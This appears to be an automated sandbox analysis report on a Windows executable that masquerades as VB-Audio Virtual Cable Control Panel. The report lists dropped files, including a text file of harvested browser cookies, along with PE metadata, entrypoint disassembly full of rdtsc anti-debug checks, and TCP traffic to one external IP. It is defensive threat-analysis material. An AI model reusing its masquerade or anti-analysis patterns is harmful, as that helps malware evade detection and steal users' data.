                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):103632
                                                                                                                                                Entropy (8bit):6.404475911013687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.txt
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23914
                                                                                                                                                Entropy (8bit):3.719911941386575
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:b3r3Ii3M35gYs3b370v323V3b3h7I67T3qihW/j+es8JlkS3D:bb/cJgYsLL0vmFLR7IUqmR8JlkS3D
                                                                                                                                                MD5:A8B67189AA1F9DAA1DF00583F7A3DA6F
                                                                                                                                                SHA1:0D5F62621E11E7EBA831576B56FADAED57D31DCA
                                                                                                                                                SHA-256:5A427E57B186089AAC42F1C00D9D88ACCCAD0E1C0423BEFA769A7E72E9F826E6
                                                                                                                                                SHA-512:673F9D7CA779F4E136503B6A0B2914BA24E28E23EA78503D9A47308030C02E52A5C95445EC396399ED0DE578F0ED89E5E1038F573A666D71693FAE19F23EF4BA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.1. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".m.a.r.k.e.t.P.r.e.f.".,.....".V.a.l.u.e.".:.".d.e.-.c.h.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".Y.e.s.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".2.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.0.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.0. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".P.r.e.f.e.r.e.n.c.e.s.M.s.n.".,.....".V.a.l.u.e.".:.".e.y.J.F.e.H.B.p.c.n.l.U.a.W.1.l.I.j.o.2.M.z.c.y.O.D.g.1.O.T.M.z.N.j.g.z.N.j.I.z.M.D.U.s.I.l.Z.l.c.n.N.p.b.2.4.i.O.j.F.9.0.".,...

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.867812997543559
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Cyfj6XGbkd.exe
                                                                                                                                                File size:4247224
                                                                                                                                                MD5:63204eb716c856723a010747d58a6b00
                                                                                                                                                SHA1:7e97f00b4c3580cedee02c448ac9aeb54afefbd2
                                                                                                                                                SHA256:6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456
                                                                                                                                                SHA512:4b00dc3d824d3526972f74b913cff2b1d0e12745de58bfe4ba6196088a17b2346b4ec019bdf923acc57c77f88aa7b17fa230100c6c35b6672c7a39bfa4953c2e
                                                                                                                                                SSDEEP:49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
                                                                                                                                                File Content Preview:MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:b595139bec4252a9

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x403bc3
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:3a057d8e2436bad9e0ae8c20a8d4d334

                                                                                                                                                Authenticode Signature

                                                                                                                                                Signature Valid:
                                                                                                                                                Signature Issuer:
                                                                                                                                                Signature Validation Error:
                                                                                                                                                Error Number:
                                                                                                                                                Not Before, Not After
                                                                                                                                                  Subject Chain
                                                                                                                                                    Version:
                                                                                                                                                    Thumbprint MD5:
                                                                                                                                                    Thumbprint SHA-1:
                                                                                                                                                    Thumbprint SHA-256:
                                                                                                                                                    Serial:

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    sub ebp, 18h
                                                                                                                                                    mov dword ptr [ebp-14h], 00403BC3h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019EA3h
                                                                                                                                                    mov eax, dword ptr [edx]
                                                                                                                                                    mov esi, esp
                                                                                                                                                    mov ecx, esi
                                                                                                                                                    push edx
                                                                                                                                                    call edi
                                                                                                                                                    mov ebx, dword ptr [ebx]
                                                                                                                                                    add ebx, eax
                                                                                                                                                    mov edx, dword ptr [edx]
                                                                                                                                                    mov ebx, dword ptr [ebx]
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push 00000005h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019E9Fh
                                                                                                                                                    pop ebx
                                                                                                                                                    inc edi
                                                                                                                                                    mov ecx, esi
                                                                                                                                                    mov ebx, dword ptr [esp]
                                                                                                                                                    mov ecx, dword ptr [ebx]
                                                                                                                                                    call dword ptr [eax]
                                                                                                                                                    mov ebp, ecx
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    mov eax, 00403F45h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019E9Ch
                                                                                                                                                    mov ecx, dword ptr [ecx]
                                                                                                                                                    mov ecx, esi
                                                                                                                                                    mov ecx, ebp
                                                                                                                                                    cmp eax, edx
                                                                                                                                                    mov edi, ebp
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push eax
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019EA1h
                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                    dec eax
                                                                                                                                                    imul eax, edx
                                                                                                                                                    mov edx, dword ptr [eax]
                                                                                                                                                    mov ebx, dword ptr [ecx]
                                                                                                                                                    add eax, edx
                                                                                                                                                    push ecx
                                                                                                                                                    pop eax
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push 000013C5h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019E9Eh
                                                                                                                                                    mov eax, ebx
                                                                                                                                                    call esi
                                                                                                                                                    mov ecx, dword ptr [edi]
                                                                                                                                                    imul eax, edx
                                                                                                                                                    call dword ptr [ebx]
                                                                                                                                                    dec edx
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push 00000079h

                                                                                                                                                    Rich Headers

                                                                                                                                                    Programming Language:
                                                                                                                                                    • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                    • [ C ] VS98 (6.0) SP6 build 8804

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb8f00x8c.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000xc0590.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xd20000x1eb8
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xb0000x1c4.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x92760xa000False0.565625data6.61275809173IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0xb0000x12dc0x2000False0.28466796875data3.67874100082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0xd0000x4ea40x4000False0.1611328125data1.88336858311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rsrc0x120000xc05900xc1000False0.293020614071data5.94457194459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                    RT_BITMAP0x124e00xbf518dataFrenchFrance
                                                                                                                                                    RT_ICON0x121e00x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576FrenchFrance
                                                                                                                                                    RT_MENU0xd19f80x3d4dataFrenchFrance
                                                                                                                                                    RT_GROUP_ICON0x124c80x14dataFrenchFrance
                                                                                                                                                    RT_VERSION0xd1dd00x3c0dataFrenchFrance
                                                                                                                                                    RT_MANIFEST0xd21900x3f9XML 1.0 document, ASCII text, with CRLF line terminatorsFrenchFrance

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
                                                                                                                                                    KERNEL32.dllFlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount
                                                                                                                                                    USER32.dllGetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA
                                                                                                                                                    GDI32.dllSetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject
                                                                                                                                                    ADVAPI32.dllRegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey
                                                                                                                                                    SHELL32.dllShellExecuteA
                                                                                                                                                    SETUPAPI.dllSetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList

                                                                                                                                                    Version Infos

                                                                                                                                                    DescriptionData
                                                                                                                                                    LegalCopyrightV.Burel2012-2015
                                                                                                                                                    InternalNameVBCABLE_ControlPanel
                                                                                                                                                    FileVersion1, 0, 3, 5
                                                                                                                                                    CompanyNameVB-AUDIO Software
                                                                                                                                                    CommentsVB-AUDIO Control Panel forVB-Audio Virtual Cable
                                                                                                                                                    ProductNameVBCABLE_ControlPanel
                                                                                                                                                    ProductVersion1, 0, 3, 5
                                                                                                                                                    FileDescriptionVB-AUDIO Virtual Cable Control Panel
                                                                                                                                                    OriginalFilenameVBCABLE_ControlPanel.exe
                                                                                                                                                    Translation0x0000 0x04b0

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    FrenchFrance

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 29, 2021 17:36:38.256937981 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.306694031 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.306782007 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.307451963 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.307509899 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.355701923 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.355820894 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379690886 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379713058 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379725933 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379738092 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379745007 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379833937 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.392950058 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.392991066 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.439117908 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.439142942 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444030046 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444063902 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444089890 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444117069 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444120884 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.444150925 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444159985 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.485577106 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.555047035 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.555078983 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.601149082 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.601165056 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.608758926 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.608782053 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.609004974 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.609302998 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.609328032 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.609415054 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.610405922 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.657092094 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.871623993 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.871685028 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.918102980 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.918132067 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932384968 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932411909 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932545900 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.932952881 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932970047 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.933042049 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.933917999 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.985033989 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.548799992 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.594649076 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.595305920 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.603761911 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.603826046 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.653562069 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.653582096 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.686892033 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.695880890 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696003914 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696084023 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696084976 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.696126938 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696185112 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.696902990 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.727946997 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.732964993 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.733454943 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.738434076 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.738558054 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.784315109 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.784346104 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807162046 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807198048 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807224989 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807250023 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807271957 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807357073 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.807379961 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.876214027 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.255383968 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.255412102 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.302926064 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.302954912 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311367989 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311407089 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311429977 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311451912 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311466932 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311543941 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.311564922 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:52.775774956 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.304384947 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.304445028 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.352152109 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.352173090 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358536005 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358561039 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358577013 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358596087 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358608961 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358711004 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.358757019 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.381866932 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.382005930 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.427772999 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.427791119 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.432903051 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.432929039 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.433023930 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.433439970 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.433466911 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.433542967 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.434422970 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.486438990 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.186005116 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.186244011 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.235177994 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.243818045 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.243854046 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.243989944 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.244170904 CET8049730104.21.23.16192.168.2.6
